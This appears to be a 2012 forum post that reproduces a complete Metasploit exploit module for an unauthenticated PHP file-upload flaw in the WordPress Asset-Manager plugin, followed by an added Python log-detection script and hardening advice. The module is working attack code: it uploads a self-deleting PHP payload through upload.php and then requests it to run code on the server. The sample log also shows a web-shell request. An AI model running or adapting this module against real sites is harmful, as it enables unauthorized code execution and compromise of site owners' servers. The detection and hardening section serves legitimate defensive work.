WordPress Asset-Manager PHP文件上传漏洞

Original poster, posted on 2012-12-31 09:22:33
This Metasploit module exploits a vulnerability found in version 2.0 and below of the Asset-Manager WordPress plugin. The plugin's upload.php accepts PHP files: a user can upload a file to a temp directory without authentication, which leads to arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  # PhpEXE supplies get_write_exec_payload: for the PHP target it returns the PHP
  # payload itself, for the Linux x86 target a PHP dropper that writes and runs
  # the native payload.
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    # Random five-letter file name; the payload removes itself after it runs
    # (:unlink_self), so little is left on disk afterwards.
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # upload.php reads the uploaded file from the multipart field named "Filedata".
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored file name back in the response body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in a web-accessible temp directory; requesting it executes it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    # No response is expected when the payload blocks (e.g. a reverse shell), so
    # only an explicit non-200 reply is treated as failure.
    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end
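As an added example, not part of the original post or of the Metasploit module above: a Python script that looks in combined-format web-server access logs for the two-request pattern the module produces, a successful POST to the plugin's upload.php followed shortly by a GET for a .php file under wp-content/uploads/assets/temp/. The log lines are constructed for illustration; the ten-minute window, the confidence labels and the field names are my own assumptions.

```python
"""Detect the Asset-Manager upload.php attack pattern in web-server access logs.

Added example (not part of the forum post or the Metasploit module). Looks for
a successful POST to the plugin's upload.php followed, from the same client and
within WINDOW, by a GET for a .php file under wp-content/uploads/assets/temp/.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" format; only the fields used below are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_PATH = "/wp-content/plugins/asset-manager/upload.php"
# Match the directory, not the five-letter name the module generates: a manual
# attacker can choose any file name.
TEMP_PHP_RE = re.compile(r"/wp-content/uploads/assets/temp/([^/]+\.php)$", re.I)
WINDOW = timedelta(minutes=10)  # assumption: how long an upload counts as "recent"


def parse_line(line):
    """Return the fields we need as a dict, or None for lines we cannot parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop the query string
        "status": int(m["status"]),
    }


def find_upload_exec_chains(lines):
    """Return one record per GET of temp/*.php, rated by whether the same client
    uploaded through upload.php shortly before."""
    events = sorted(filter(None, map(parse_line, lines)), key=lambda e: e["ts"])
    uploads = defaultdict(list)  # client IP -> timestamps of successful uploads
    hits = []
    for e in events:
        if e["method"] == "POST" and e["path"].endswith(UPLOAD_PATH):
            if e["status"] == 200:
                uploads[e["ip"]].append(e["ts"])
            continue
        m = TEMP_PHP_RE.search(e["path"])
        if e["method"] != "GET" or not m:
            continue
        recent = [t for t in uploads[e["ip"]] if timedelta(0) <= e["ts"] - t <= WINDOW]
        hits.append({
            "ip": e["ip"],
            "file": m.group(1),
            "exec_at": e["ts"],
            "status": e["status"],
            # high: same client uploaded minutes earlier; low: no upload in our
            # log window, but nobody should be fetching .php from temp/ anyway.
            "confidence": "high" if recent else "low",
            "upload_at": recent[-1] if recent else None,
        })
    return hits


# Constructed sample log, not from a real incident.
SAMPLE_LOG = """\
198.51.100.7 - - [31/Dec/2012:09:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Dec/2012:09:20:05 +0000] "POST /wordpress/wp-content/plugins/asset-manager/upload.php HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.7 - - [31/Dec/2012:09:20:06 +0000] "GET /wordpress/wp-content/uploads/assets/temp/kTzqW.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.9 - - [31/Dec/2012:10:41:30 +0000] "GET /wordpress/wp-content/uploads/assets/temp/shell.php?cmd=id HTTP/1.1" 200 512 "-" "curl/7.26"
203.0.113.9 - - [31/Dec/2012:10:42:00 +0000] "GET /wordpress/wp-content/uploads/assets/temp/logo.png HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in find_upload_exec_chains(SAMPLE_LOG.splitlines()):
        print(hit)
```

Because the module's payload unlinks itself, the temp directory is often empty by the time anyone looks, and the access log is the only trace of the upload. A 200 on the GET is what the module treats as success, so a high-confidence hit with status 200 should be handled as code execution, not as an attempt. On the hardening side, nothing under wp-content/uploads needs to execute PHP, so denying PHP execution for that tree closes the execution step even where the upload itself still succeeds.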